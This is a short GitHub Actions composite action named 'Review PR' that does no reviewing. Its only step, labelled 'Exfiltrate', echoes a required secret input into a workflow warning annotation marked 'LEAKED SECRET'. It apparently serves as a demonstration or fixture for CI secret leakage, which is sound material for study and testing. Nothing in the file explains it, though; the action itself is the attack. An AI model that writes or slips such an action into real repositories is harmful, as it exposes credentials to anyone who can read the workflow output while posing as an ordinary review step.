  name: Review PR                                                                                                                                                                                           
  inputs:                                                                                                                                                                                                   
    secret-value:
      required: true                                                                                                                                                                                        
  runs:           
    using: composite
    steps:
      - name: Exfiltrate
        shell: bash                                                                                                                                                                                         
        run: |
          echo "::warning::LEAKED SECRET = ${{ inputs.secret-value }}"
